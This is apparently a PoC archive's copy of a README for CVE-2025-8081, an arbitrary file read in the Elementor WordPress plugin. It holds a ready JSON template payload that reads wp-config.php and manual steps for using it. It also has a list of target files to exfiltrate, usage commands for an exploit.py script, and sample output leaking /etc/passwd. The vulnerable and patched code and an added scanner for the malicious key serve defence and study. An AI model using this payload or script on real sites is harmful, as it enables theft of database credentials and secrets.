Related Vulnerability

Title: WordPress plugin Elementor path traversal vulnerability (CVE-2025-8081)

Description: WordPress and WordPress plugin are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it supports hosting a personal blog site on a server running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin Elementor 3.30.2 and earlier versions contain a path traversal vulnerability. The flaw stems from arbitrary file reading and may lead to information disclosure.

Description
PoC for CVE-2025-8081 - Elementor Arbitrary File Read Vulnerability

Introduction
            # CVE-2025-8081 - Elementor Arbitrary File Read Vulnerability
A critical arbitrary file read vulnerability in Elementor WordPress plugin that allows authenticated administrators to read any file accessible by the web server, including sensitive configuration files containing database credentials.
---
## 📋 Vulnerability Overview
### CVE Information
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-8081 |
| **Type** | Arbitrary File Read (CWE-22: Path Traversal) |
| **CVSS Score** | 4.9 (Medium) - **Real Impact: CRITICAL** |
| **CVSS Vector** | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N |
| **Affected Versions** | Elementor ≤ 3.30.2 |
| **Fixed Version** | Elementor ≥ 3.30.3 |
| **Release Date** | July 22, 2025 |
| **Disclosure Date** | October 15, 2025 |
### Attack Requirements
- ✅ WordPress Administrator account
- ✅ Elementor plugin installed and activated
- ✅ Access to template import functionality
- ✅ Image Elementor Widget enabled
### Impact
- 🔴 **Arbitrary File Read**: Read any file accessible by the web server user (www-data)
- 🔴 **Credential Theft**: Access to `wp-config.php` reveals database credentials and security keys
- 🔴 **Database Compromise**: Full access to WordPress database using stolen credentials
---
## 🎯 Vulnerability Details
### Location
The vulnerability exists in a **single file** at a **single line**:
```
elementor/includes/template-library/classes/class-import-images.php
Line 115 (v3.28.3)
```
### Vulnerable Code (v3.28.3)
```php
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = Utils::file_get_contents( $attachment['tmp_name'] );  // ❌ NO VALIDATION!
}
```
**Problem**: The `tmp_name` parameter is **NOT validated** with `is_uploaded_file()`, allowing an attacker to specify **arbitrary file paths**.
### Patched Code (v3.30.3)
```php
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = false;
    // security validation in case the tmp_name has been tampered with
    if ( is_uploaded_file( $attachment['tmp_name'] ) ) {  // ✅ VALIDATION ADDED!
        $file_content = Utils::file_get_contents( $attachment['tmp_name'] );
    }
}
```
**Fix**: The patch adds `is_uploaded_file()` validation to ensure `tmp_name` refers to a legitimate HTTP POST uploaded file.
---
## 💣 Proof of Concept
### JSON Payload
```json
{
  "content": [{
    "id": "s1",
    "elType": "section",
    "settings": [],
    "elements": [{
      "id": "c1",
      "elType": "column",
      "settings": {"_column_size": 100},
      "elements": [{
        "id": "w1",
        "elType": "widget",
        "widgetType": "image",
        "settings": {
          "image": {
            "url": "http://x.com/x.jpg",
            "id": 1,
            "tmp_name": "/var/www/html/wp-config.php",
            "name": "leaked_config.txt"
          }
        },
        "elements": []
      }]
    }]
  }],
  "version": "0.4",
  "type": "page"
}
```
### Manual Exploitation Steps
1. Login to WordPress as Administrator
2. Navigate to **Elementor** → **My Templates** → **Import Templates**
3. Upload the JSON payload above (save as `payload.json`)
4. Click **Import Now**
5. Go to **Media** → **Library**
6. Find and download `leaked_config.txt`
**Result**: `wp-config.php` content with database credentials exposed!
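As an added defender-side check (not part of this PoC repository or of Elementor), the following Python script scans a template JSON before import for the indicator that both the vulnerable code and the payload above depend on: a `tmp_name` key inside an element's settings, which a legitimate export never carries because `tmp_name` only exists for a real PHP upload. The two sample templates are constructed to match the payload's section > column > image widget shape.

```python
import json

# Constructed sample shaped like the payload above: section > column > image widget.
MALICIOUS_TEMPLATE = json.dumps({"version": "0.4", "type": "page", "content": [
    {"id": "s1", "elType": "section", "settings": [], "elements": [
        {"id": "c1", "elType": "column", "settings": {"_column_size": 100}, "elements": [
            {"id": "w1", "elType": "widget", "widgetType": "image", "elements": [],
             "settings": {"image": {"url": "http://x.com/x.jpg", "id": 1,
                                    "tmp_name": "/var/www/html/wp-config.php",
                                    "name": "leaked_config.txt"}}}]}]}]})

# Same layout as a normal export would look: url/id only, no tmp_name.
BENIGN_TEMPLATE = json.dumps({"version": "0.4", "type": "page", "content": [
    {"id": "s1", "elType": "section", "settings": [], "elements": [
        {"id": "c1", "elType": "column", "settings": {"_column_size": 100}, "elements": [
            {"id": "w1", "elType": "widget", "widgetType": "image", "elements": [],
             "settings": {"image": {"url": "http://x.com/x.jpg", "id": 1}}}]}]}]})

def _walk_settings(value, path, findings):
    """Record every dict under a settings value that carries a tmp_name key."""
    if isinstance(value, dict):
        if "tmp_name" in value:
            findings.append({"path": path, "tmp_name": value["tmp_name"],
                             "name": value.get("name")})
        for key, child in value.items():
            _walk_settings(child, f"{path}.{key}", findings)
    elif isinstance(value, list):
        for i, child in enumerate(value):
            _walk_settings(child, f"{path}[{i}]", findings)

def _walk_elements(elements, findings):
    """Descend the section > column > widget tree used by Elementor templates."""
    for el in elements:
        if not isinstance(el, dict):
            continue
        label = f"{el.get('elType', '?')}:{el.get('id', '?')}"
        if el.get("widgetType"):
            label += f"({el['widgetType']})"
        _walk_settings(el.get("settings", {}), label + ".settings", findings)
        _walk_elements(el.get("elements", []), findings)

def scan_template(template_json):
    """Return one finding per setting carrying tmp_name; [] means nothing suspicious."""
    findings = []
    _walk_elements(json.loads(template_json).get("content", []), findings)
    return findings

if __name__ == "__main__":
    for name, tpl in (("malicious", MALICIOUS_TEMPLATE), ("benign", BENIGN_TEMPLATE)):
        print(name, scan_template(tpl))
```

A non-empty result is a reason to reject the import; on a patched install the `is_uploaded_file()` check already neutralises the key, so this is a pre-import filter and log indicator rather than a substitute for upgrading.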
---
## 📊 Interesting Files to Exfiltrate
### Critical Files
| File | Description | Impact |
|------|-------------|--------|
| `/var/www/html/wp-config.php` | WordPress configuration | 🔴 **CRITICAL** - DB credentials |
| `/proc/self/environ` | Environment variables | 🔴 **CRITICAL** - API keys, secrets |
### High Value Files
| File | Description | Impact |
|------|-------------|--------|
| `/etc/passwd` | System users | 🟠 **HIGH** - User enumeration |
| `/var/www/html/.htaccess` | Web server config | 🟠 **HIGH** - Configuration disclosure |
| `/var/log/apache2/access.log` | Apache logs | 🟡 **MEDIUM** - Information disclosure |
---
## 🛠️ Automated Exploitation
### Quick Start
```bash
python3 exploit.py -t https://target.com -u admin -p password123
```
### Command-Line Options
```
Required Arguments:
  -t, --target URL        Target WordPress URL (e.g., https://target.com)
  -u, --user USERNAME     WordPress admin username
  -p, --password PASS     WordPress admin password
Optional Arguments:
  -f, --file PATH         File to read (default: /var/www/html/wp-config.php)
  -o, --output FILE       Output filename (default: auto-generated)
  --insecure, -k          Disable SSL certificate verification
  -v, --verbose           Enable verbose output for debugging
  -h, --help              Show help message
```
### Usage Examples
```bash
# Basic exploitation (reads wp-config.php with default payload)
python3 exploit.py -t http://target.com -u admin -p password123
# Custom target file
python3 exploit.py -t http://target.com -u admin -p password123 -f /etc/passwd
# With HTTPS and self-signed certificate
python3 exploit.py -t https://target.com -u admin -p password123 --insecure
# Verbose mode with custom output
python3 exploit.py -t http://target.com -u admin -p password123 \
  -f /etc/passwd -o users.txt -v
# From OrbStack/Docker targeting host machine
python3 exploit.py -t http://host.internal:8080 -u admin -p password123 -v
```
### Expected Output
```
Kali:~$ python3 exploit.py  -t http://host.internal:8080 -u admin -p admin123 -f /etc/passwd
======================================================================
 CVE-2025-8081 - Elementor Arbitrary File Read
======================================================================
Target: http://host.internal:8080
File:   /etc/passwd
======================================================================
[INFO] Attempting WordPress authentication...
[SUCCESS] ✓ Authentication successful!
[INFO] Fetching AJAX nonce...
[INFO] Loading payload: payload.json
[INFO] Uploading malicious template...
[SUCCESS] ✓ Template uploaded successfully!
[INFO] Searching for leaked file: leaked_passwd.txt
[SUCCESS] ✓ Found file: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
[INFO] Downloading file...
[SUCCESS] ✓ Downloaded 839 bytes
======================================================================
 EXPLOITATION SUCCESSFUL!
======================================================================
File URL:  http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
File size: 839 bytes
Saved to:  leaked_passwd.txt
--- FILE CONTENT (first 500 chars) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin
--- END ---
======================================================================
```
---
## ⚖️ Legal Disclaimer
**FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY**
This tool is provided for security research and penetration testing purposes only. Usage of this tool for attacking targets without prior mutual consent is **illegal**.
**It is the end user's responsibility to obey all applicable local, state, and federal laws.**
- ✅ Use only on systems you own or have explicit written permission to test
- ✅ Responsible disclosure practices
- ✅ Educational and research purposes
- ❌ Unauthorized access is illegal and punishable by law
- ❌ The author assumes no liability for misuse
**By using this tool, you agree to use it legally and ethically.**
---
Last Updated: October 17, 2025

File snapshot

 [4.0K]  /data/pocs/9bce1bcc187466f6f113bbdc54264d34d28c024e
├── [ 17K]  exploit.py
├── [1.7K]  LICENSE
├── [ 580]  payload_env.json
├── [ 574]  payload_etc_passwd.json
├── [ 591]  payload.json
└── [8.1K]  README.md
0 directories, 6 files

Notes

1. It is recommended to access the PoC through its original source first.
2. If the source has gone offline or is inaccessible, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.